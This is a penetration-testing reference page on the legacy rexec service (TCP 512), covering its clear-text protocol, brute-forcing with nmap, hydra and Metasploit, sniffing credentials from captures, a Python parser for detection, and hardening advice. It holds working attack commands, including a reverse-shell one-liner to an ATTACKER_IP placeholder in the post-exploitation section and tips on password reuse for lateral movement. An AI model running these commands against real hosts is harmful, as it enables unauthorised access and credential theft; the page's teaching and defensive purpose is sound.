---
title: "512 - Rexec"
weight: 512
date: "2026-03-10T10:03:28+08:00"
lastmod: "2026-03-10T13:26:55+08:00"
---

💡 **Study note**: This document covers penetration-testing methodology for **512 - rexec** and is intended as a reference for information-security beginners and practitioners.

⚠️ **Legal notice**: This document is for learning and authorized testing only. Testing systems without authorization may violate laws and regulations.

---

#### Protocol quick-look

1. The client connects to TCP 512.
2. The client sends three **NUL-terminated** strings:
   * the port number (as ASCII) where it wishes to receive stdout/stderr (often `0`),
   * the **username**,
   * the **password**.
3. A final NUL-terminated string with the **command** to execute follows.
4. The server replies with a single 8-bit status byte (`0` = success, `1` = failure) followed by the command output.

That means you can reproduce the exchange with nothing more than `echo -ne` and `nc`:

```bash
(echo -ne "0\0user\0password\0id\0"; cat) | nc <target> 512
```

If the credentials are valid you will receive the output of `id` straight back on the same connection.

#### Manual usage with the client

Many Linux distributions still ship the legacy client inside the **inetutils-rexec** / **rsh-client** package:

```bash
rexec -l user -p password <target> "uname -a"
```

If `-p` is omitted the client will prompt interactively for the password (visible on the wire in clear-text!).

---
### Information gathering & Brute-forcing

#### [**Brute-force**](../generic-hacking/brute-force.md#rexec)

#### Nmap

```bash
# Discover the service banner and test for stdout-port mis-configuration
nmap -p 512 --script rexec-info <target>

nmap -p 512 --script rexec-brute --script-args "userdb=users.txt,passdb=rockyou.txt" <target>
```
The `rexec-brute` NSE script uses the protocol described above to try credentials very quickly.

#### Hydra / Medusa / Ncrack

```bash
hydra -L users.txt -P passwords.txt rexec://<target> -s 512 -t 8
```
`hydra` has a dedicated **rexec** module and remains the fastest offline brute-forcer. `medusa` (`-M REXEC`) and `ncrack` (`rexec` module) can be used in the same way.

#### Metasploit

```
use auxiliary/scanner/rservices/rexec_login
set RHOSTS <target>
set USER_FILE users.txt
set PASS_FILE passwords.txt
run
```
The module will spawn a shell on success and store the credentials in the database.

---
### Sniffing credentials

Because everything is clear-text, **network captures are priceless**.  With a copy of the traffic you can extract creds without touching the target:

```bash
tshark -r traffic.pcap -Y 'tcp.port == 512' -T fields -e tcp.stream | sort -un   # list the TCP streams on :512
tshark -r traffic.pcap -q -z follow,tcp,ascii,0   # reassemble stream 0; the NUL separators print as dots: 0.user.password.id.
```

(In Wireshark enable *Decode As…* TCP 512 → REXEC to view nicely parsed fields.)
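The framing from the protocol quick-look and the credential extraction attempted with `tshark` above can be done in a few lines once the TCP stream is reassembled. The following is an added example (not from the original page or from any rexec implementation): it encodes a request exactly as the client puts it on the wire, parses a captured client payload into its four fields, splits the server reply into status byte and output, and emits a detection summary that reports the password length rather than the password; all payload bytes are constructed.

```python
# Added example: decode the clear-text rexec framing described above.
# Four NUL-terminated strings: secondary (stderr) port, user, password, command.
from dataclasses import dataclass
from typing import Optional

@dataclass
class RexecRequest:
    stderr_port: int
    user: str
    password: str
    command: str

def build_request(stderr_port: int, user: str, password: str, command: str) -> bytes:
    """Encode a request the way the echo/nc one-liner does: each field followed by NUL."""
    fields = (str(stderr_port), user, password, command)
    return b"".join(f.encode() + b"\x00" for f in fields)

def parse_request(payload: bytes) -> Optional[RexecRequest]:
    """Parse a reassembled client->server stream; None if incomplete or malformed."""
    parts = payload.split(b"\x00")
    # Four NUL-terminated fields split into five parts; the fifth is whatever
    # follows the command (normally empty). Fewer means the capture is truncated.
    if len(parts) < 5:
        return None
    port_s, user, password, command = (p.decode("utf-8", "replace") for p in parts[:4])
    if not port_s.isdigit() or not 0 <= int(port_s) <= 65535:
        return None
    return RexecRequest(int(port_s), user, password, command)

def parse_response(payload: bytes) -> tuple[bool, bytes]:
    """Split the server reply into (authenticated, output); status byte 0 = OK, 1 = failure."""
    if not payload:
        raise ValueError("empty reply")
    return payload[0] == 0, payload[1:]

def alert_lines(payload: bytes) -> list[str]:
    """Detection helper: summarise a clear-text login without logging the password itself."""
    req = parse_request(payload)
    if req is None:
        return []
    return [f"rexec clear-text auth: user={req.user!r} pw_len={len(req.password)} cmd={req.command!r}"]

# Constructed sample traffic on TCP/512 (not a real capture).
SAMPLE_CLIENT = build_request(0, "user", "password", "id")
SAMPLE_SERVER_OK = b"\x00uid=1000(user) gid=1000(user)\n"
SAMPLE_SERVER_FAIL = b"\x01Login incorrect.\n"

if __name__ == "__main__":
    print(parse_request(SAMPLE_CLIENT))
    print(parse_response(SAMPLE_SERVER_OK))
    print(alert_lines(SAMPLE_CLIENT))
```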

---
### Post-exploitation tips

* Commands run with the privileges of the supplied user.  If `/etc/pam.d/rexec` is mis-configured (e.g. `pam_rootok`), root shells are sometimes possible.
* Rexec ignores the user’s shell and executes the command via `/bin/sh -c <cmd>`.  You can therefore use typical shell-escape tricks (`;`, ``$( )``, backticks) to chain multiple commands or spawn reverse shells:
  ```bash
  rexec -l user -p pass <target> 'bash -c "bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1"'
  ```
* Passwords are often stored in **~/.netrc** on other systems; if you compromise one host you may reuse them for lateral movement.

---
### Hardening / Detection

* **Do not expose rexec**; replace it with SSH.  Virtually all modern *inetd* superservers comment the service out by default.
* If you must keep it, restrict access with TCP wrappers (`/etc/hosts.allow`) or firewall rules and enforce strong per-account passwords.
* Monitor for traffic to :512 and for `rexecd` process launches.  A single packet capture is enough to detect a compromise.
* Disable `rexec`, `rlogin`, `rsh` together – they share most of the same codebase and weaknesses.

---

### Search-engine queries

#### FOFA

```bash
# FOFA search syntax
port="512"
```

#### Shodan

```bash
# Shodan search syntax
port:512
```

#### ZoomEye

```bash
# ZoomEye search syntax
port:512
```

---

## 📖 References

- [HackTricks - 512-rexec](https://book.hacktricks.wiki/en/network-services-pentesting/512-rexec.html)

